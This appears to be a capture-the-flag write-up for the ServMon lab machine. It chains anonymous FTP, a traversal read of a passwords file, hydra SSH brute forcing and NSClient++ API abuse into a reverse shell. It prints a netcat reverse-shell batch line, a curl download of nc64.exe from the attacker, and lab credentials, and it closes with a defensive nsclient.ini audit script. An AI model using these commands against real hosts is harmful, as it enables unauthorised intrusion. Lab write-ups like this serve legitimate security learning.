ServMon

☕ 2 min read · ✍️ M4t35Z

IP: 10.10.10.184


Recon

nmap(big)

FTP

$ ftp 10.10.10.184
  • anonymous login

file tree for ftp:

Users
├── Nadine
│   └── Confidential.txt
└── Nathan
    └── Notes to do.txt

Confidential.txt:

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Notes to do.txt:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Web

We have NVMS-1000 running on port 80

Confidential.txt mentions a Passwords.txt file on the desktop!
/users/nadine/desktop/Passwords.txt –> not working
/users/nathan/desktop/passwords.txt –> working!


passwords.txt

Attack SSH with the user list and password list:

$ cat users.txt
Nadine
Nathan
$ cat passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

We use hydra to brute the ssh:

hydra -L users.txt -P passwords.txt ssh://10.10.10.184

And we got the CREDS!!

Nadine:L1k3B1gBut7s@W0rk

SSH in as nadine

$ ssh Nadine@10.10.10.184
  • provide the pw L1k3B1gBut7s@W0rk
$ type user.txt
72d4837b515dc77ecbaaccfdbb0c951e
C:\RecData\RecordInfoDB.db3
$ scp nadine@10.10.10.184:/RecData/RecordInfoDB.db3 ./RecordInfoDB.db3
  • –> nothing useful inside
C:\Users\Nadine\MicrosoftEdgeBackups\backups\MicrosoftEdgeBackup20200114>
C:\Program Files\NSClient++>nscp.exe web password -display

Current password: ew2x6SsGTxjRwXOT

SSH tunnel port 8443

ssh nadine@10.10.10.184
<enter>
<enter>
~C
ssh> -L 8443:127.0.0.1:8443

The page

https://127.0.0.1:8443/index.html

  • provide the pw ew2x6SsGTxjRwXOT
  • Daamn this shit is laggy af

Documentation

https://docs.nsclient.org/api/rest/

Getting root with curl

You need an ayy.bat file in your current dir:

C:\temp\nc.exe 10.10.14.80 1337 -e cmd.exe

Upload the file:

$ curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/ayy.bat --data-binary @ayy.bat

Check if it’s uploaded correctly:

$ curl -s -k -u admin https://localhost:8443/api/v1/scripts/ext/scripts/ayy.bat

Check the queries:

$ curl -s -k -u admin https://localhost:8443/api/v1/queries |python -m json.tool
$ curl -s -k -u admin https://localhost:8443/api/v1/queries/ayy |python -m json.tool

  • got it!
  • You must upload an nc64.exe build that has the -e flag to C:\Temp\nc.exe

On victim:

$ curl -LO <attacker ip>/nc64.exe
$ move nc64.exe nc.exe

Execute it!

$ curl -s -k -u admin "https://localhost:8443/api/v1/queries/ayy/commands/execute?time=1m" | python -m json.tool
  • BOOM ROOTSHELL

$ type root.txt
28db65bd057c64d0188a212061851a7e
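From the defender's side, everything that let this API accept and run a script lives in nsclient.ini. Added example (mine, not from the writeup and not NSClient++'s own code): a small Python audit of two constructed nsclient.ini fragments, a weak one mirroring what the box exposed and a hardened one; section and key names follow the NSClient++ ini layout, and treating an empty, "*" or 0.0.0.0 allowed hosts value as "open" is an assumption.

```python
import configparser

# Constructed nsclient.ini fragments (illustrative, not the box's real file);
# section and key names follow the NSClient++ ini layout.
WEAK_INI = """
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
[/settings/default]
allowed hosts = 127.0.0.1
password = ew2x6SsGTxjRwXOT
[/settings/external scripts]
allow arguments = true
allow nasty characters = true
"""
HARDENED_INI = """
[/modules]
WEBServer = enabled
CheckExternalScripts = disabled
[/settings/default]
allowed hosts = 127.0.0.1
password = ew2x6SsGTxjRwXOT
[/settings/external scripts]
allow arguments = false
allow nasty characters = false
"""

def audit_nsclient_ini(text):
    """Return (finding_id, severity) pairs for risky NSClient++ settings."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    def get(section, key):
        return cp.get(section, key, fallback="").strip().lower()
    findings = []
    if get("/modules", "WEBServer") == "enabled" and \
            get("/modules", "CheckExternalScripts") == "enabled":
        # Web API plus external scripts: /api/v1/scripts can add and run scripts.
        findings.append(("api_can_run_scripts", "high"))
    if get("/settings/external scripts", "allow arguments") == "true":
        findings.append(("allow_arguments", "medium"))
    if get("/settings/external scripts", "allow nasty characters") == "true":
        findings.append(("allow_nasty_characters", "medium"))
    hosts = get("/settings/default", "allowed hosts")
    if hosts in ("", "*") or "0.0.0.0" in hosts:  # assumption: these mean "open"
        findings.append(("allowed_hosts_open", "high"))
    if get("/settings/default", "password"):
        # Password lives here; on ServMon a normal user read it via nscp.exe: check ACLs.
        findings.append(("password_in_ini", "info"))
    return findings
```

The hardened fragment still reports the password finding on purpose: the file and nscp.exe need an ACL check even when the script modules are off.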